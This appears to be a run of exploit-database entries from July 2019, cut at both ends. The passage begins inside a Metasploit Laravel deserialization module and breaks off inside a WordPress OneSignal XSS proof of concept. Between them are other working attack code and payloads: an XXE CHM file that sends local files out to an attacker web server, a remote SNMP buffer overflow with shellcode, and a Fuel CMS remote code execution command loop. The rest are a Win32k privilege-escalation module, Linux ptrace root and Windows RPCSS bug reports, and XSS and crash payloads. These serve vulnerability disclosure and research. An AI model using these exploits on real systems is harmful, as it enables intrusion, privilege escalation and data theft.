APP_KEY value or information leak is invalid.' return end 1.upto(4) do |method| sploit = generate_token(payload.encoded, auth_token, method) res = send_request_cgi({ 'uri' => normalize_uri(target_uri.path, 'index.php'), 'method' => 'POST', 'headers' => { 'X-XSRF-TOKEN' => sploit, } }, 5) # Stop when one of the deserialization attacks works break if session_created? if res && res.body.include?('The MAC is invalid|Method Not Allowed') # Not conclusive print_status 'Target appears to be patched or otherwise immune' end end end end

[+] Credits: John Page (aka hyp3rlinx) [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/MICROSOFT-WINDOWS-HTML-HELP-UNCOMPILED-CHM-FILE-XML-EXTERNAL-ENTITY-INJECTION.txt [+] ISR: ApparitionSec [Vendor] www.microsoft.com [Product] Microsoft Compiled HTML Help "hh.exe" Microsoft Compiled HTML Help is a Microsoft proprietary online help format, consisting of a collection of HTML pages, an index and other navigation tools. The files are compressed and deployed in a binary format with the extension .CHM, for Compiled HTML. The format is often used for software documentation. CHM is an extension for the Compiled HTML file format, most commonly used by Microsoft's HTML-based help program. [Vulnerability Type] Uncompiled .CHM File XML External Entity Injection [CVE Reference] N/A [Security Issue] CHM Files are usually created using Microsofts "HTML Help Workshop" program. However, I find a way to bypass using this program and create them easily by simply adding double .chm extension to the file ".chm.chm". Compiled HTML Help "hh.exe" will then respect and open it processing any JS/HTML/XML inside etc. Compiled HTML Help is also vulnerable to XML External Entity attacks allowing remote attackers to steal and exfiltrate local system files. Whats interesting about this one is we can create the file without using the "Microsoft HTML Help Workshop" program. Also, we can steal files without having to use the "hhtctrl.ocx" ActiveX control CLASSID: 52a2aaae-085d-4187-97ea-8c30db990436 or other code execution methods. While CHM is already considered a "dangerous" file type and other type of attacks have already been documented. I thought this was an interesting way to create CHM files "Uncompiled" bypassing the default creation steps while stealing local files in the process. Note: User interaction is required to exploit this vulnerability. [Exploit/POC] 1) python -m SimpleHTTPServer 2) "XXE.chm.chm" <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML//EN"> <HTML> <HEAD> <Title>Uncompiled CHM File XXE PoC</Title> </HEAD> <BODY> <xml> <?xml version="1.0" encoding="utf-8"?> <!DOCTYPE tastyexploits [ <!ENTITY % file SYSTEM "C:\Windows\system.ini"> <!ENTITY % dtd SYSTEM "http://localhost:81/payload.dtd"> %dtd;]> <pwn>&send;</pwn> </xml> </BODY> </HTML> 3) "payload.dtd" (hosted in python web-server dir port 81 above) <?xml version="1.0" encoding="UTF-8"?> <!ENTITY % all "<!ENTITY send SYSTEM 'http://localhost:81?%file;'>"> %all; Open the "XXE.chm.chm" file and will exfil Windows "system.ini", attacker Server IP is set to localhost using port 81 for PoC. Tested successfully Windows 7/10 [POC Video URL] https://www.youtube.com/watch?v=iaxp1iBDWXY [Network Access] Remote [Severity] High [Disclosure Timeline] Vendor Notification: April 25, 2019 MSRC Response: "We determined that this behavior is considered to be by design" July 16, 2019 : Public Disclosure [+] Disclaimer The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. All content (c). hyp3rlinx

# Exploit Title: Oracle Siebel CRM 19.0 - Persistent Cross-Site Scripting # Date: 2019-07-17 # Exploit Author: Sarath Nair aka AceNeon13 # Contact: @AceNeon13 # Vendor Homepage: www.oracle.com # Software Link: https://www.oracle.com/applications/siebel/ # Version: Siebel CRM (UI Framework) Version 19.0 and prior # CVE: N/A # Greetings: Deepu.tv # PoC Exploit: Persistent Cross Site Scripting by Insecure File Upload ----------------------------------------------------------------------- Vulnerable URL: http://<Siebel_Application>/finsadm_enu/start.swe?SWECmd=GotoView&SWEView=Activity+Attachment+View #Steps to exploit the issue: #1. Login to the CRM application and navigate to ‘Activities’ and click on ‘All Activities’. #2. Edit one of the existing activity, or create a new one. #3. Use the ‘New File’ menu in ‘attachments’ section to upload an HTML file with JavaScript payload (via a proxy tool). #4. JavaScript payload will be triggered/rendered upon the victim user views the attached file. # Description: The Siebel CRM application allows its users to upload any file types in most of the available file upload functionalities, later on, the uploaded file can be downloaded by another user with the appropriate privileges as part of the workflow. As such, it was possible to upload file with the “html” extension, (containing html and JavaScript code) thereby allowing to also perform Persistent Cross Site Scripting attack. # Impact: Cross-Site Scripting attacks do not target the server but rather its users. A hypothetical attacker could use the web server in order to trick other users into unwillingly executing malicious code saved on the server with XSS payload. The impacts of such attack can range from the disclosure of the user’s sensitive information to execution of arbitrary code on the target user’s system. # Solution: Apply the Oracle Siebel CRM patch released on 16 July 2019 ######################################## # Vulnerability Disclosure Timeline: 2017-December-23: Discovered vulnerability 2017-December-25: Vendor Notification 2017-December-27: Vendor Response/Feedback 2019-July-16: Vendor Fix/Patch 2019-July-17: Public Disclosure ######################################## Warm regards, Sarath Nair

# Exploit Title: WinMPG iPod Convert 3.0 - 'Register' Denial of Service # Date: 2019-07-16 # Vendor Homepage:http://www.winmpg.com # Software Link: https://www.techspot.com/downloads/downloadnow/6192/?evp=d62142990e9320a4e811b283fdcc4060&file= # Exploit Author: stresser # Tested Version: 3.0 # Tested on: Windows XP SP3 EN # 1.- Run python code :WinMPG.py # 2.- Open EVIL.txt and copy content to clipboard # 3.- Open WinMPG and Click 'Register' # 4.- Paste the content of EVIL.txt into the Field: 'User Name and User Code' # 5.- Click 'Ok'and you will see a crash. #!/usr/bin/env python buffer = "\x41" * 6000 try: f=open("Evil.txt","w") print "[+] Creating %s bytes evil payload.." %len(buffer) f.write(buffer) f.close() print "[+] File created!" except: print "File cannot be created"

# Exploit Title: MAPLE Computer WBT SNMP Administrator 2.0.195.15 - Remote Buffer Overflow # Author: hyp3rlinx # Discovery Date: 2019-07-17 # Vendor Homepage: www.computerlab.com # Software Link: https://www.computerlab.com/index.php/downloads/category/27-device-manager # Software Link: ftp://downloads.computerlab.com/software/SnmpSetup.195.15.EXE # Tested on OS: Windows # CVE: CVE-2019-13577 [+] Credits: John Page (aka hyp3rlinx) [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/MAPLE-WBT-SNMP-ADMINISTRATOR-v2.0.195.15-REMOTE-BUFFER-OVERFLOW-CODE-EXECUTION-0DAY.txt [+] ISR: Apparition Security [Vendor] www.computerlab.com [Product] MAPLE Computer WBT SNMP Administrator (Thin Client Administrator) v2.0.195.15 https://www.computerlab.com/index.php/downloads/category/27-device-manager ftp://downloads.computerlab.com/software/SnmpSetup.195.15.EXE SnmpSetup.195.15.EXE - MD5 Hash: a3913aae166c11ddd21dca437e78c3f4 The CLI Thin Client Manager is designed to provide remote management and control of CLI Thin Clients. This software is built on the TCP/IP industry standard SNMP (Simple Network Communication Protocol). Agents are built into the clients for remote management and configuration. [Vulnerability Type] Unauthenticated Remote Buffer Overflow Code Execution 0day [CVE Reference] CVE-2019-13577 [Security Issue] SnmpAdm.exe in MAPLE WBT SNMP Administrator v2.0.195.15 has an Unauthenticated Remote Buffer Overflow via a long string to the CE Remote feature listening on Port 987. This will overwrite data on the stack/registers and allow for control of the programs execution flow resulting in attacker supplied remote code execution. Authentication is not required for this exploit. This program seems to be packed using ASPack v2.12 and can be difficult to unpack because it uses self-modifying code. When installing the vulnerable program if asks for a serial number just enter a value of "1" or something. Upon launching the program if any errors occur try right click SnmpAdm.exe and run it as Admin. Interestingly, it seems to drop DLLs with .tmp extensions in AppData\Local\Temp directory, make OS system files viewable in explorer to see them. e.g. C:\Users\blah\AppData\Local\Temp\~ip6B92.tmp ASLR / SEH all set to False helping to make exploit more portable. CALL EBX 10008FB3 0x10008fb3 : call ebx | null {PAGE_EXECUTE_READ} [ipwSNMPv5.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v5.0.0.1364 (C:\Program Files (x86)\SnmpAdm\ipwSNMPv5.dll) Stack dump: EAX 41414141 ECX 0018FEFC EDX 0018FF10 EBX 022DDA78 ASCII "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA ESP 0018FECC EBP 0018FEF4 ESI 0018FF10 EDI 0018FEFC EIP 41414141 C 0 ES 002B 32bit 0(FFFFFFFF) P 1 CS 0023 32bit 0(FFFFFFFF) A 0 SS 002B 32bit 0(FFFFFFFF) Z 0 DS 002B 32bit 0(FFFFFFFF) S 0 FS 0053 32bit 7EFDD000(FFF) T 0 GS 002B 32bit 0(FFFFFFFF) D 0 O 0 LastErr ERROR_NO_SCROLLBARS (000005A7) EFL 00010206 (NO,NB,NE,A,NS,PE,GE,G) [Exploit/POC] from socket import * import struct,sys,argparse #MAPLE WBT SNMP Administrator (SnmpAdm.exe) v2.0.195.15 #CVE-2019-13577 #Remote Buffer Overflow 0day #hyp3rlinx - ApparitionSec #Pop calc.exe Windows 7 SP1 sc=("\x31\xF6\x56\x64\x8B\x76\x30\x8B\x76\x0C\x8B\x76\x1C\x8B" "\x6E\x08\x8B\x36\x8B\x5D\x3C\x8B\x5C\x1D\x78\x01\xEB\x8B" "\x4B\x18\x8B\x7B\x20\x01\xEF\x8B\x7C\x8F\xFC\x01\xEF\x31" "\xC0\x99\x32\x17\x66\xC1\xCA\x01\xAE\x75\xF7\x66\x81\xFA" "\x10\xF5\xE0\xE2\x75\xCF\x8B\x53\x24\x01\xEA\x0F\xB7\x14" "\x4A\x8B\x7B\x1C\x01\xEF\x03\x2C\x97\x68\x2E\x65\x78\x65" "\x68\x63\x61\x6C\x63\x54\x87\x04\x24\x50\xFF\xD5\xCC") eip = struct.pack("<L", 0x10008fb3) #JMP EBX popebx = struct.pack("<L", 0x022C0012) #5B POP EBX buf0="B"*693704 buf1=eip buf2=popebx+sc+"R"*899+"W"*23975 payload=buf0+buf1+buf2 def doit(IP,payload): try: s=socket(AF_INET, SOCK_STREAM) s.connect((IP, 987)) s.send(payload) print "CVE-2019-13577 - WBT SNMP Administrator Buffer Overflow 0day." print "hyp3rlinx" s.close() except Exception as e: print str(e) def parse_args(): parser = argparse.ArgumentParser() parser.add_argument("-i", "--ipaddress", help="IP of Target CVE-2019-13577") return parser.parse_args() def main(args): doit(args.ipaddress,payload) if __name__ == "__main__": if not len(sys.argv) > 1: print "[*] No args supplied see Help -h" exit() main(parse_args()) [POC Video URL] https://www.youtube.com/watch?v=THMqueCIrFw [Network Access] Remote [Severity] High [Disclosure Timeline] Vendor Notification: July 10, 2019 Second vendor notification attempt: July 13, 2019 No vendor replies. July 17, 2019 : Public Disclosure [+] Disclaimer The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. All content (c). hyp3rlinx

== Summary == This bug report describes two issues introduced by commit 64b875f7ac8a ("ptrace: Capture the ptracer's creds not PT_PTRACE_CAP", introduced in v4.10 but also stable-backported to older versions). I will send a suggested patch in a minute ("ptrace: Fix ->ptracer_cred handling for PTRACE_TRACEME"). When called for PTRACE_TRACEME, ptrace_link() would obtain an RCU reference to the parent's objective credentials, then give that pointer to get_cred(). However, the object lifetime rules for things like struct cred do not permit unconditionally turning an RCU reference into a stable reference. PTRACE_TRACEME records the parent's credentials as if the parent was acting as the subject, but that's not the case. If a malicious unprivileged child uses PTRACE_TRACEME and the parent is privileged, and at a later point, the parent process becomes attacker-controlled (because it drops privileges and calls execve()), the attacker ends up with control over two processes with a privileged ptrace relationship, which can be abused to ptrace a suid binary and obtain root privileges. == Long bug description == While I was trying to refactor the cred_guard_mutex logic, I stumbled over the following issues: ptrace relationships can be set up in two ways: Either the tracer attaches to another process (PTRACE_ATTACH/PTRACE_SEIZE), or the tracee forces its parent to attach to it (PTRACE_TRACEME). When a tracee goes through a privilege-gaining execve(), the kernel checks whether the ptrace relationship is privileged. If it is not, the privilege-gaining effect of execve is suppressed. The idea here is that a privileged tracer (e.g. if root runs "strace" on some process) is allowed to trace through setuid/setcap execution, but an unprivileged tracer must not be allowed to do that, since it could otherwise inject arbitrary code into privileged processes. In the PTRACE_ATTACH/PTRACE_SEIZE case, the tracer's credentials are recorded at the time it calls PTRACE_ATTACH/PTRACE_SEIZE; later, when the tracee goes through execve(), it is checked whether the recorded credentials are capable over the tracee's user namespace. But in the PTRACE_TRACEME case, the kernel also records _the tracer's_ credentials, even though the tracer is not requesting the operation. There are two problems with that. First, there is an object lifetime issue: ptrace_traceme() -> ptrace_link() grabs __task_cred(new_parent) in an RCU read-side critical section, then passes the creds to __ptrace_link(), which calls get_cred() on them. If the parent concurrently switches its creds (e.g. via setresuid()), the creds' refcount may already be zero, in which case put_cred_rcu() will already have been scheduled. The kernel usually manages to panic() before memory corruption occurs here using the following code in put_cred_rcu(); however, I think memory corruption would also be possible if this code races exactly the right way. if (atomic_read(&cred->usage) != 0) panic("CRED: put_cred_rcu() sees %p with usage %d\n", cred, atomic_read(&cred->usage)); A simple PoC to trigger this bug: ============================ #define _GNU_SOURCE #include <unistd.h> #include <signal.h> #include <sched.h> #include <err.h> #include <sys/prctl.h> #include <sys/types.h> #include <sys/ptrace.h> int grandchild_fn(void *dummy) { if (ptrace(PTRACE_TRACEME, 0, NULL, NULL)) err(1, "traceme"); return 0; } int main(void) { pid_t child = fork(); if (child == -1) err(1, "fork"); /* child */ if (child == 0) { static char child_stack[0x100000]; prctl(PR_SET_PDEATHSIG, SIGKILL); while (1) { if (clone(grandchild_fn, child_stack+sizeof(child_stack), CLONE_FILES|CLONE_FS|CLONE_IO|CLONE_PARENT|CLONE_VM|CLONE_SIGHAND|CLONE_SYSVSEM|CLONE_VFORK, NULL) == -1) err(1, "clone failed"); } } /* parent */ uid_t uid = getuid(); while (1) { if (setresuid(uid, uid, uid)) err(1, "setresuid"); } } ============================ Result: ============================ [ 484.576983] ------------[ cut here ]------------ [ 484.580565] kernel BUG at kernel/cred.c:138! [ 484.585278] Kernel panic - not syncing: CRED: put_cred_rcu() sees 000000009e024125 with usage 1 [ 484.589063] CPU: 1 PID: 1908 Comm: panic Not tainted 5.2.0-rc7 #431 [ 484.592410] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.12.0-1 04/01/2014 [ 484.595843] Call Trace: [ 484.598688] <IRQ> [ 484.601451] dump_stack+0x7c/0xbb [...] [ 484.607349] panic+0x188/0x39a [...] [ 484.622650] put_cred_rcu+0x112/0x120 [...] [ 484.628580] rcu_core+0x664/0x1260 [...] [ 484.646675] __do_softirq+0x11d/0x5dd [ 484.649523] irq_exit+0xe3/0xf0 [ 484.652374] smp_apic_timer_interrupt+0x103/0x320 [ 484.655293] apic_timer_interrupt+0xf/0x20 [ 484.658187] </IRQ> [ 484.660928] RIP: 0010:do_error_trap+0x8d/0x110 [ 484.664114] Code: da 4c 89 ee bf 08 00 00 00 e8 df a5 09 00 3d 01 80 00 00 74 54 48 8d bb 90 00 00 00 e8 cc 8e 29 00 f6 83 91 00 00 00 02 75 2b <4c> 89 7c 24 40 44 8b 4c 24 04 48 83 c4 08 4d 89 f0 48 89 d9 4c 89 [ 484.669035] RSP: 0018:ffff8881ddf2fd58 EFLAGS: 00000246 ORIG_RAX: ffffffffffffff13 [ 484.672784] RAX: 0000000000000000 RBX: ffff8881ddf2fdb8 RCX: ffffffff811144dd [ 484.676450] RDX: 0000000000000007 RSI: dffffc0000000000 RDI: ffff8881eabc4bf4 [ 484.680306] RBP: 0000000000000006 R08: fffffbfff0627a02 R09: 0000000000000000 [ 484.684033] R10: 0000000000000000 R11: 0000000000000000 R12: 0000000000000004 [ 484.687697] R13: ffffffff82618dc0 R14: 0000000000000000 R15: ffffffff810c99d5 [...] [ 484.700626] do_invalid_op+0x31/0x40 [...] [ 484.707183] invalid_op+0x14/0x20 [ 484.710499] RIP: 0010:__put_cred+0x65/0x70 [ 484.713598] Code: 48 8d bd 90 06 00 00 e8 49 e2 1f 00 48 3b 9d 90 06 00 00 74 19 48 8d bb 90 00 00 00 48 c7 c6 50 98 0c 81 5b 5d e9 ab 1f 08 00 <0f> 0b 0f 0b 0f 0b 0f 1f 44 00 00 55 53 48 89 fb 48 81 c7 90 06 00 [ 484.718633] RSP: 0018:ffff8881ddf2fe68 EFLAGS: 00010202 [ 484.722407] RAX: 0000000000000001 RBX: ffff8881f38a4600 RCX: ffffffff810c9987 [ 484.726147] RDX: 0000000000000003 RSI: dffffc0000000000 RDI: ffff8881f38a4600 [ 484.730049] RBP: ffff8881f38a4600 R08: ffffed103e7148c1 R09: ffffed103e7148c1 [ 484.733857] R10: 0000000000000001 R11: ffffed103e7148c0 R12: ffff8881eabc4380 [ 484.737923] R13: 00000000000003e8 R14: ffff8881f1a5b000 R15: ffff8881f38a4778 [...] [ 484.748760] commit_creds+0x41c/0x520 [...] [ 484.756115] __sys_setresuid+0x1cb/0x1f0 [ 484.759634] do_syscall_64+0x5d/0x260 [ 484.763024] entry_SYSCALL_64_after_hwframe+0x49/0xbe [ 484.766441] RIP: 0033:0x7fcab9bb4845 [ 484.769839] Code: 0f 1f 44 00 00 48 83 ec 38 64 48 8b 04 25 28 00 00 00 48 89 44 24 28 31 c0 8b 05 a6 8e 0f 00 85 c0 75 2a b8 75 00 00 00 0f 05 <48> 3d 00 f0 ff ff 77 53 48 8b 4c 24 28 64 48 33 0c 25 28 00 00 00 [ 484.775183] RSP: 002b:00007ffe01137aa0 EFLAGS: 00000246 ORIG_RAX: 0000000000000075 [ 484.779226] RAX: ffffffffffffffda RBX: 0000000000000000 RCX: 00007fcab9bb4845 [ 484.783057] RDX: 00000000000003e8 RSI: 00000000000003e8 RDI: 00000000000003e8 [ 484.787101] RBP: 00007ffe01137af0 R08: 0000000000000000 R09: 00007fcab9caf500 [ 484.791045] R10: fffffffffffff4d4 R11: 0000000000000246 R12: 00005573b2f240b0 [ 484.794891] R13: 00007ffe01137bd0 R14: 0000000000000000 R15: 0000000000000000 [ 484.799171] Kernel Offset: disabled [ 484.802932] ---[ end Kernel panic - not syncing: CRED: put_cred_rcu() sees 000000009e024125 with usage 1 ]--- ============================ The second problem is that, because the PTRACE_TRACEME case grabs the credentials of a potentially unaware tracer, it can be possible for a normal user to create and use a ptrace relationship that is marked as privileged even though no privileged code ever requested or used that ptrace relationship. This requires the presence of a setuid binary with certain behavior: It has to drop privileges and then become dumpable again (via prctl() or execve()). - task A: fork()s a child, task B - task B: fork()s a child, task C - task B: execve(/some/special/suid/binary) - task C: PTRACE_TRACEME (creates privileged ptrace relationship) - task C: execve(/usr/bin/passwd) - task B: drop privileges (setresuid(getuid(), getuid(), getuid())) - task B: become dumpable again (e.g. execve(/some/other/binary)) - task A: PTRACE_ATTACH to task B - task A: use ptrace to take control of task B - task B: use ptrace to take control of task C Polkit's pkexec helper fits this pattern. On a typical desktop system, any process running under an active local session can invoke some helpers through pkexec (see configuration in /usr/share/polkit-1/actions, search for <action>s that specify <allow_active>yes</allow_active> and <annotate key="org.freedesktop.policykit.exec.path">...</annotate>). While pkexec is normally used to run programs as root, pkexec actually allows its caller to specify the user to run a command as with --user, which permits using pkexec to run a command as the user who executed pkexec. (Which is kinda weird... why would I want to run pkexec helpers as more than one fixed user?) I have attached a proof-of-concept that works on Debian 10 running a distro kernel and the XFCE desktop environment; if you use a different desktop environment, you may have to add a path to the `helpers` array in the PoC. When you compile and run it in an active local session, you should get a root shell within a second. Proof of Concept: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/47133.zip

## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Local Rank = ManualRanking include Msf::Post::File include Msf::Exploit::EXE include Msf::Post::Windows::Priv include Msf::Exploit::FileDropper def initialize(info={}) super(update_info(info, 'Name' => 'Windows NtUserSetWindowFNID Win32k User Callback', 'Description' => %q{ An elevation of privilege vulnerability exists in Windows when the Win32k component fails to properly handle objects in memory, aka "Win32k Elevation of Privilege Vulnerability." This affects Windows 7, Windows Server 2012 R2, Windows RT 8.1, Windows Server 2008, Windows Server 2019, Windows Server 2012, Windows 8.1, Windows Server 2016, Windows Server 2008 R2, Windows 10, Windows 10 Servers. This module is tested against Windows 10 v1703 x86. }, 'License' => MSF_LICENSE, 'Author' => [ 'ze0r', # Exploit analysis and PoC 'Kaspersky Lab', # Vulnerability discovery/detection 'Jacob Robles' # Metasploit module ], 'Platform' => 'win', 'Arch' => ARCH_X86, 'SessionTypes' => [ 'meterpreter' ], 'DefaultOptions' => { 'EXITFUNC' => 'thread' }, 'Targets' => [ [ 'Windows 10 v1703 (Build 15063) x86', { 'UniqueProcessIdOffset' => 180, 'TokenOffset' => 252, 'Version' => 'Windows 10 (Build 15063)' } ] ], 'References' => [ ['CVE', '2018-8453'], ['URL', 'https://github.com/ze0r/cve-2018-8453-exp'], ['URL', 'https://mp.weixin.qq.com/s/ogKCo-Jp8vc7otXyu6fTig'], ['URL', 'https://mp.weixin.qq.com/s/dcbUeegM0BqErtDufOXfoQ'], ['URL', 'https://securelist.com/cve-2018-8453-used-in-targeted-attacks/88151/'], ['URL', 'https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8453'] ], 'Notes' => { 'SideEffects' => [ARTIFACTS_ON_DISK, SCREEN_EFFECTS], 'Stability' => [CRASH_OS_RESTARTS] }, 'DisclosureDate' => '2018-10-09', 'DefaultTarget' => 0 )) end def target_info fail_with(Failure::None, 'Session is already elevated') if is_system? unless sysinfo['OS'].start_with?(target['Version']) && sysinfo['Architecture'] == 'x86' fail_with(Failure::NoTarget, 'Target is not compatible with exploit') end end def write_file_to_target(fname, data) tempdir = session.sys.config.getenv('TEMP') file_loc = "#{tempdir}\\#{fname}" vprint_warning("Attempting to write #{fname} to #{tempdir}") write_file(file_loc, data) vprint_good("#{fname} written") file_loc rescue Rex::Post::Meterpreter::RequestError => e elog("#{e.class} #{e.message}\n#{e.backtrace * "\n"}") fail_with(Failure::Unknown, "Writing #{fname} to disk was unsuccessful") end def exploit target_info exe_name = 'CVE-2018-8453.exe' exe_path = File.join(Msf::Config.data_directory, 'exploits', 'CVE-2018-8453', exe_name) vprint_status("Reading payload from file #{exe_path}") raw = File.read(exe_path) tmp_exe = "#{Rex::Text.rand_text_alphanumeric(10)}.exe" vprint_status("Uploading exploit exe as: #{tmp_exe}") exe_rpath = write_file_to_target(tmp_exe, raw) register_file_for_cleanup(exe_rpath) tmp_payload = "#{Rex::Text.rand_text_alpha(6..14)}.exe" payload_rpath = write_file_to_target(tmp_payload, generate_payload_exe) vprint_status("Uploading payload #{tmp_payload}") register_file_for_cleanup(payload_rpath) command = "\"#{exe_rpath}\" \"#{payload_rpath}\" #{target['UniqueProcessIdOffset']} #{target['TokenOffset']}" vprint_status("Executing command: #{command}") session.sys.process.execute(command, nil, {'Hidden' => false}) print_good('Exploit finished, wait for privileged payload execution to complete.') end end

Windows: RPCSS Activation Kernel Security Callback EoP Platform: Windows 10 1903/1809 (not tested earlier) Class: Elevation of Privilege Security Boundary (per Windows Security Service Criteria): User boundary Summary: The RPCSS Activation Kernel RPC server’s security callback can be bypassed resulting in EoP. Description: The RPCSS service is split into two components, RPCSS which runs as a low-privileged service account and the DCOM launch service which runs as SYSTEM and is responsible for creating new COM processes. Communication between the two services is over an RPC service named Activation Kernel (actkernel). When RPCSS receives a DCOM activation request it will pass that request on to the actkernel service to create new processes. The actkernel RPC service implements various privileged operations, therefore it shouldn’t be callable from a normal user account. However the service must know who made the activation request to RPCSS. This is acheived by RPCSS impersonating the activator while making the RPC request to actkernel which means the ALPC port used by actkernel must be accessible by any process capable of activating a DCOM object, including AC and LPAC. To limit the call to only RPCSS the service implements a security callback on the RPC server which checks the caller process ID the RPCSS service, this should block arbitrary users on the system calling the service. Unfortunately there’s a flaw in this design, RPC defaults to caching the results on these security checks and actkernel doesn’t disable this feature. What this means is once a call is made to actkernel from RPCSS with a user’s token the security result is cached. Now that same user can access actkernel directly as the security callback will not be made and the PID will not be checked. The caching is done primarily on the token’s modified ID, which doesn’t change as often as you’d expect including across ALPC impersonation. As long as the user has made some activation request (such as creating an OOP COM server) then the result is cached and the process can access privileged operations. Looking at what the service exposes an AC sandbox escape might be the best approach. For example the service exposes PrivGetPsmToken which will set an arbitrary SYSAPPID value to a token and return it to the caller. If done from an AC this token is still an AC token in the original package, but with an arbitrary SYSAPPID set which means that security checks which rely on that value can be bypassed. As the AC sid isn’t changed this means it can be impersonated by the caller. This could allow sandbox escape via Browser Broker or Desktop Broker by pretending to be Edge or a side-loaded application. Fixing wise if performance is acceptable then setting the RPC_IF_SEC_NO_CACHE flag on the interface registration should ensure the security callback is always made. You’d probably want to do a search for similar interfaces on Windows. Actkernel might be special in doing a PID check and allowing arbitrary callers via another route but I can’t be sure it’s the only one. Proof of Concept: I’ve provided a PoC as a C# project. It will use the vulnerability to get a token with an arbitrary SYSAPPID. It first respawns the PoC as the calculator AC, then gets a token for MicrosoftEdge. It doesn’t attempt to escape the sandbox, but I’m confident it’d be possible to achieve. 1) Compile the C# project. It’ll need to pull NtApiDotNet from NuGet to build. 2) As a normal user run the PoC. 3) The PoC should print the subkeys of the SAM hive. Expected Result: Accessing the actkernel RPC service should fail with an RPC fault. Observed Result: The actkernel RPC service grants access Proof of Concept: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/47135.zip

# Exploit Title: fuel CMS 1.4.1 - Remote Code Execution (1) # Date: 2019-07-19 # Exploit Author: 0xd0ff9 # Vendor Homepage: https://www.getfuelcms.com/ # Software Link: https://github.com/daylightstudio/FUEL-CMS/releases/tag/1.4.1 # Version: <= 1.4.1 # Tested on: Ubuntu - Apache2 - php5 # CVE : CVE-2018-16763 import requests import urllib url = "http://127.0.0.1:8881" def find_nth_overlapping(haystack, needle, n): start = haystack.find(needle) while start >= 0 and n > 1: start = haystack.find(needle, start+1) n -= 1 return start while 1: xxxx = raw_input('cmd:') burp0_url = url+"/fuel/pages/select/?filter=%27%2b%70%69%28%70%72%69%6e%74%28%24%61%3d%27%73%79%73%74%65%6d%27%29%29%2b%24%61%28%27"+urllib.quote(xxxx)+"%27%29%2b%27" proxy = {"http":"http://127.0.0.1:8080"} r = requests.get(burp0_url, proxies=proxy) html = "<!DOCTYPE html>" htmlcharset = r.text.find(html) begin = r.text[0:20] dup = find_nth_overlapping(r.text,begin,2) print r.text[0:dup]

# Exploit Title: WordPress Plugin OneSignal 1.17.5 - Persistent Cross-Site Scripting # Date: 2019-07-18 # Vendor Homepage: https://www.onesignal.com # Software Link: https://wordpress.org/plugins/onesignal-free-web-push-notifications/ # Affected version: 1.17.5 # Exploit Author: LiquidWorm # Tested on: Linux Summary: OneSignal is a high volume and reliable push notification service for websites and mobile applications. We support all major native and mobile platforms by providing dedicated SDKs for each platform, a RESTful server API, and an online dashboard for marketers to design and send push notifications. Desc: The application suffers from an authenticated stored XSS via POST request. The issue is triggered when input passed via the POST parameter 'subdomain' is not properly sanitized before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site. Tested on: WordPress 5.2.2 Apache/2.4.39 PHP/7.1.30 Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2019-5530 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5530.php <html> <body> <script>history.pushState('', 'SHPA', '/')</script> <form action="http://127.0.0.1/wp-admin/admin.php?page=onesignal-push" method="POST"> <input type="hidden" name="onesignal_config_page_nonce" value="f7fae30a4f" /> <input type="hidden" name="_wp_http_referer" value="/wp-admin/admin.php?page=onesignal-push" /> <input type="hidden" name="app_id" value="14d99ab2-fc9d-1337-bc16-a8a6df479515" /> <input type="hidden" name="app_rest_api_key" value="M2IzZDA4MzItOGJmOS00YjRkLWE4YzEtZSLmMjllNjlkYmZl" /> <input type="hidden" name="subdomain" value=""><script>confirm(251)</script>" /> <input type="hidden" name="safari_web_id" value="" /> <input type="hidden" name="showNotificationIconFromPostThumbnail" value="true" /> <input type="hidden" name="showNotificationImageFromPostThumbnail" value="true" /> <input type="hidden" name="persist_notifications" value="platform-default" /> <input type="hidden" name="notification_title" value="hACKME" /> <input type="hidden" name="notifyButton_enable" value="true" /> <input type="hidden" name="notifyButton_showAfterSubscribed" value="true" /> <input type="hidden" name="notifyButton_prenotify" value="true" /> <input type="hidden" name="notifyButton_showcredit" value="true" /> <input type="hidden" name="notifyButton_customize_enable" value="true" /> <input type="hidden" name="notifyButton_size" value="medium" /> <input type="hidden" name="notifyButton_position" value="bottom-right" /> <input type="hidden" name="notifyButton_theme" value="default" /> <input type="hidden" name="notifyButton_offset_bottom" value="" /> <input type="hidden" name="notifyButton_offset_left" value="" /> <input type="hidden" name="notifyButton_offset_right" value="" /> <input type="hidden" name="notifyButton_color_background" value="" /> <input type="hidden" name="notifyButton_color_foreground" value="" /> <input type="hidden" name="notifyButton_color_badge_background" value="" /> <input type="hidden" name="notifyButton_color_badge_foreground" value="" /> <input type="hidden" name="notifyButton_color_badge_border" value="" /> <input type="hidden" name="notifyButton_color_pulse" value="" /> <input type="hidden" name="notifyButton_color_popup_button_background" value="" /> <input type="hidden" name="notifyButton_color_popup_button_background_hover" value="" /> <input 